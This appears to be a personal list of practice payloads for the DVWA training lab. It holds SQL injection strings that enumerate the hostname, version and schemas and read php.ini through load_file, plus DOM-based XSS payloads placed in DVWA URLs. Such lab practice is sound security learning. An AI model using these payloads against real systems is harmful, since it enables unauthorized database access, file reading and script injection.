1

1' or '1'='1

a' ORDER BY 1;#

' union select null,@@hostname#

' UNION SELECT load_file('C:\\xampp\\php\\php.ini'), null#

' UNION SELECT null, schema_name FROM information_schema.schemata -- 

' UNION SELECT null, @@version --



DOM

localhost/dvwa/vulnerabilities/xss_d/?default=input=<script>alert('XSS');</script>

(med)
localhost/dvwa/vulnerabilities/xss_d/?default=<script>alert('XSS');</script>

localhost/dvwa/vulnerabilities/xss_d/?default=<a href="javascript:alert(XSS)">HI</a>




<script>alert('XSS');</script>